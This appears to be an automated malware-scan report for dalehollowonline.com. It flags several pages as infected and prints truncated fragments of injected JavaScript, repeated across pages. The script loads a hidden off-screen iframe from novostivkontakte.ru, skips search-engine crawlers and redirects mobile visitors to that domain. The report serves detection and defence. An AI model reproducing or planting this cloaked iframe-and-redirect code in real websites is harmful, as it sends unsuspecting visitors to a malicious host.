Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=dalehollowonline.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://dalehollowonline.com/ | 200 OK Content-Length: 34948 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: novostivkontakte.ru ...[549 bytes skipped]... order = "0"; dsdSSSWrw515312FFF.style.position = "absolute"; dsdSSSWrw515312FFF.style.left = "-200"; dsdSSSWrw515312FFF.setAttribute("frameBorder", "0"); document.body.appendChild(dsdSSSWrw515312FFF); dsdSSSWrw515312FFF.src = agaga31323l; return true; } } function asd61234tkhjasd454hfhf235(){ sd5135GHEDF("http://novostivkontakte.ru/?id=ifrm"); } function SFWR64362fdhHHHHH(){ if(navigator.userAgent.match(/(Googlebot|robot|Slurp|search.msn.com|nutch|simpy|bot|ASPSeek|crawler|msnbot|Libwww-perl|FAST|Baidu|googlebot|slurp|aspseek|libwww-perl|fast|baidu)/i)!==null){ }else{asd61234tkhjasd454hfhf235();} if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|mobile|android|blackberry|brew|cldc|doc ...[940 bytes skipped]... Decoded script: ...[349 bytes skipped]... roid|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|mobile|android|blackberry|brew|cldc|docomo|htc|j2me|micromax|lg|midp|mot|motorola|netfront|nokia|obigo|openweb|opera.mini|palm|psp|samsung|sanyo|sch|sonyericsson|symbian|symbos|teleca|up.browser|vodafone|wap|webos|windows.ce)/i) !== null) { try { setTimeout(function () {window.location = "http://novostivkontakte.ru/?id=mob";}, 1000); } catch (err) { window.location = "http://novostivkontakte.ru/?id=mob"; location.href = "http://novostivkontakte.ru/?id=mob"; } } } | ||
http://dalehollowonline.com/media/system/js/core.js | 200 OK Content-Length: 3616 Content-Type: application/javascript | clean |
http://dalehollowonline.com/media/system/js/mootools-core.js | 200 OK Content-Length: 83987 Content-Type: application/javascript | clean |
http://dalehollowonline.com/media/system/js/caption.js | 200 OK Content-Length: 800 Content-Type: application/javascript | clean |
http://dalehollowonline.com/media/system/js/mootools-more.js | 200 OK Content-Length: 224389 Content-Type: application/javascript | clean |
http://dalehollowonline.com/templates/beez_20/javascript/md_stylechanger.js | 200 OK Content-Length: 2104 Content-Type: application/javascript | clean |
http://dalehollowonline.com/modules/mod_ariyuimenu/mod_ariyuimenu/js/yui.combo.js | 200 OK Content-Length: 136091 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(typeof YAHOO=="undefined"||!YAHOO){var YAHOO={};}YAHOO.namespace=function(){var A=arguments,E=null,C,B,D;for(C=0;C<A.length;C=C+1){D=(""+A[C]).split(".");E=YAHOO;for(B=(D[0]=="YAHOO")?1:0;B<D.length;B=B+1){E[D[B]]=E[D[B]]||{};E=E[D[B]];}}return E;};YAHOO.log=function(D,A,C){var B=YAHOO.widget.Logger;if(B&&B.log){return B.log(D,A,C);}else{return false;}};YAHOO.register=function(A,E,D){var I=YAHOO.env.modules,B,H,G,F,C;if(!I[A]){I[A]={versions:[],builds:[]};}B=I[A];H=D.version;G=D Antivirus reports:
| ||
http://dalehollowonline.com/plugins/content/jw_simpleImageGallery/jw_simpleImageGallery/includes/jquery/jquery-1.4.4.min.js | 200 OK Content-Length: 78601 Content-Type: application/javascript | clean |
http://dalehollowonline.com/plugins/content/jw_simpleImageGallery/jw_simpleImageGallery/includes/slimbox-2.04/js/slimbox2.js | 200 OK Content-Length: 4123 Content-Type: application/javascript | clean |
http://dalehollowonline.com/templates/beez_20/javascript/hide.js | 200 OK Content-Length: 7704 Content-Type: application/javascript | clean |
http://dalehollowonline.com/index.php?option=com_content&view=featured&Itemid=435 | 200 OK Content-Length: 35164 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: novostivkontakte.ru ...[549 bytes skipped]... order = "0"; dsdSSSWrw515312FFF.style.position = "absolute"; dsdSSSWrw515312FFF.style.left = "-200"; dsdSSSWrw515312FFF.setAttribute("frameBorder", "0"); document.body.appendChild(dsdSSSWrw515312FFF); dsdSSSWrw515312FFF.src = agaga31323l; return true; } } function asd61234tkhjasd454hfhf235(){ sd5135GHEDF("http://novostivkontakte.ru/?id=ifrm"); } function SFWR64362fdhHHHHH(){ if(navigator.userAgent.match(/(Googlebot|robot|Slurp|search.msn.com|nutch|simpy|bot|ASPSeek|crawler|msnbot|Libwww-perl|FAST|Baidu|googlebot|slurp|aspseek|libwww-perl|fast|baidu)/i)!==null){ }else{asd61234tkhjasd454hfhf235();} if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|mobile|android|blackberry|brew|cldc|doc ...[940 bytes skipped]... Decoded script: ...[349 bytes skipped]... roid|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|mobile|android|blackberry|brew|cldc|docomo|htc|j2me|micromax|lg|midp|mot|motorola|netfront|nokia|obigo|openweb|opera.mini|palm|psp|samsung|sanyo|sch|sonyericsson|symbian|symbos|teleca|up.browser|vodafone|wap|webos|windows.ce)/i) !== null) { try { setTimeout(function () {window.location = "http://novostivkontakte.ru/?id=mob";}, 1000); } catch (err) { window.location = "http://novostivkontakte.ru/?id=mob"; location.href = "http://novostivkontakte.ru/?id=mob"; } } } | ||
http://dalehollowonline.com/index.php?option=com_content&view=article&id=74&Itemid=475 | 200 OK Content-Length: 19907 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: novostivkontakte.ru ...[549 bytes skipped]... order = "0"; dsdSSSWrw515312FFF.style.position = "absolute"; dsdSSSWrw515312FFF.style.left = "-200"; dsdSSSWrw515312FFF.setAttribute("frameBorder", "0"); document.body.appendChild(dsdSSSWrw515312FFF); dsdSSSWrw515312FFF.src = agaga31323l; return true; } } function asd61234tkhjasd454hfhf235(){ sd5135GHEDF("http://novostivkontakte.ru/?id=ifrm"); } function SFWR64362fdhHHHHH(){ if(navigator.userAgent.match(/(Googlebot|robot|Slurp|search.msn.com|nutch|simpy|bot|ASPSeek|crawler|msnbot|Libwww-perl|FAST|Baidu|googlebot|slurp|aspseek|libwww-perl|fast|baidu)/i)!==null){ }else{asd61234tkhjasd454hfhf235();} if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|mobile|android|blackberry|brew|cldc|doc ...[940 bytes skipped]... Decoded script: ...[349 bytes skipped]... roid|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|mobile|android|blackberry|brew|cldc|docomo|htc|j2me|micromax|lg|midp|mot|motorola|netfront|nokia|obigo|openweb|opera.mini|palm|psp|samsung|sanyo|sch|sonyericsson|symbian|symbos|teleca|up.browser|vodafone|wap|webos|windows.ce)/i) !== null) { try { setTimeout(function () {window.location = "http://novostivkontakte.ru/?id=mob";}, 1000); } catch (err) { window.location = "http://novostivkontakte.ru/?id=mob"; location.href = "http://novostivkontakte.ru/?id=mob"; } } } | ||
http://dalehollowonline.com/index.php?option=com_content&view=article&id=71&Itemid=476 | 200 OK Content-Length: 29290 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: novostivkontakte.ru ...[549 bytes skipped]... order = "0"; dsdSSSWrw515312FFF.style.position = "absolute"; dsdSSSWrw515312FFF.style.left = "-200"; dsdSSSWrw515312FFF.setAttribute("frameBorder", "0"); document.body.appendChild(dsdSSSWrw515312FFF); dsdSSSWrw515312FFF.src = agaga31323l; return true; } } function asd61234tkhjasd454hfhf235(){ sd5135GHEDF("http://novostivkontakte.ru/?id=ifrm"); } function SFWR64362fdhHHHHH(){ if(navigator.userAgent.match(/(Googlebot|robot|Slurp|search.msn.com|nutch|simpy|bot|ASPSeek|crawler|msnbot|Libwww-perl|FAST|Baidu|googlebot|slurp|aspseek|libwww-perl|fast|baidu)/i)!==null){ }else{asd61234tkhjasd454hfhf235();} if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|mobile|android|blackberry|brew|cldc|doc ...[940 bytes skipped]... Decoded script: ...[349 bytes skipped]... roid|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|mobile|android|blackberry|brew|cldc|docomo|htc|j2me|micromax|lg|midp|mot|motorola|netfront|nokia|obigo|openweb|opera.mini|palm|psp|samsung|sanyo|sch|sonyericsson|symbian|symbos|teleca|up.browser|vodafone|wap|webos|windows.ce)/i) !== null) { try { setTimeout(function () {window.location = "http://novostivkontakte.ru/?id=mob";}, 1000); } catch (err) { window.location = "http://novostivkontakte.ru/?id=mob"; location.href = "http://novostivkontakte.ru/?id=mob"; } } } | ||
http://dalehollowonline.com/index.php?option=com_content&view=article&id=70&Itemid=472 | 200 OK Content-Length: 20649 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: novostivkontakte.ru ...[549 bytes skipped]... order = "0"; dsdSSSWrw515312FFF.style.position = "absolute"; dsdSSSWrw515312FFF.style.left = "-200"; dsdSSSWrw515312FFF.setAttribute("frameBorder", "0"); document.body.appendChild(dsdSSSWrw515312FFF); dsdSSSWrw515312FFF.src = agaga31323l; return true; } } function asd61234tkhjasd454hfhf235(){ sd5135GHEDF("http://novostivkontakte.ru/?id=ifrm"); } function SFWR64362fdhHHHHH(){ if(navigator.userAgent.match(/(Googlebot|robot|Slurp|search.msn.com|nutch|simpy|bot|ASPSeek|crawler|msnbot|Libwww-perl|FAST|Baidu|googlebot|slurp|aspseek|libwww-perl|fast|baidu)/i)!==null){ }else{asd61234tkhjasd454hfhf235();} if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|mobile|android|blackberry|brew|cldc|doc ...[940 bytes skipped]... Decoded script: ...[349 bytes skipped]... roid|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|mobile|android|blackberry|brew|cldc|docomo|htc|j2me|micromax|lg|midp|mot|motorola|netfront|nokia|obigo|openweb|opera.mini|palm|psp|samsung|sanyo|sch|sonyericsson|symbian|symbos|teleca|up.browser|vodafone|wap|webos|windows.ce)/i) !== null) { try { setTimeout(function () {window.location = "http://novostivkontakte.ru/?id=mob";}, 1000); } catch (err) { window.location = "http://novostivkontakte.ru/?id=mob"; location.href = "http://novostivkontakte.ru/?id=mob"; } } } | ||
http://dalehollowonline.com/index.php?option=com_content&view=article&id=74&Itemid=477 | 200 OK Content-Length: 20114 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: novostivkontakte.ru ...[549 bytes skipped]... order = "0"; dsdSSSWrw515312FFF.style.position = "absolute"; dsdSSSWrw515312FFF.style.left = "-200"; dsdSSSWrw515312FFF.setAttribute("frameBorder", "0"); document.body.appendChild(dsdSSSWrw515312FFF); dsdSSSWrw515312FFF.src = agaga31323l; return true; } } function asd61234tkhjasd454hfhf235(){ sd5135GHEDF("http://novostivkontakte.ru/?id=ifrm"); } function SFWR64362fdhHHHHH(){ if(navigator.userAgent.match(/(Googlebot|robot|Slurp|search.msn.com|nutch|simpy|bot|ASPSeek|crawler|msnbot|Libwww-perl|FAST|Baidu|googlebot|slurp|aspseek|libwww-perl|fast|baidu)/i)!==null){ }else{asd61234tkhjasd454hfhf235();} if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|mobile|android|blackberry|brew|cldc|doc ...[940 bytes skipped]... Decoded script: ...[349 bytes skipped]... roid|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|mobile|android|blackberry|brew|cldc|docomo|htc|j2me|micromax|lg|midp|mot|motorola|netfront|nokia|obigo|openweb|opera.mini|palm|psp|samsung|sanyo|sch|sonyericsson|symbian|symbos|teleca|up.browser|vodafone|wap|webos|windows.ce)/i) !== null) { try { setTimeout(function () {window.location = "http://novostivkontakte.ru/?id=mob";}, 1000); } catch (err) { window.location = "http://novostivkontakte.ru/?id=mob"; location.href = "http://novostivkontakte.ru/?id=mob"; } } } |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: dalehollowonline.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 07 Jan 2015 22:11:50 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: 91b7da0dc4e6bfc973ff8ed4fc2c48d8=btk765r1jnrg0h5db0gtrorbq7; path=/
GET / HTTP/1.1
Host: dalehollowonline.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 07 Jan 2015 22:11:50 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: 91b7da0dc4e6bfc973ff8ed4fc2c48d8=btk765r1jnrg0h5db0gtrorbq7; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: dalehollowonline.com
Referer: http://www.google.com/search?q=dalehollowonline.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: dalehollowonline.com
Referer: http://www.google.com/search?q=dalehollowonline.com
Result:
The result is similar to the first query. There are no suspicious redirects found.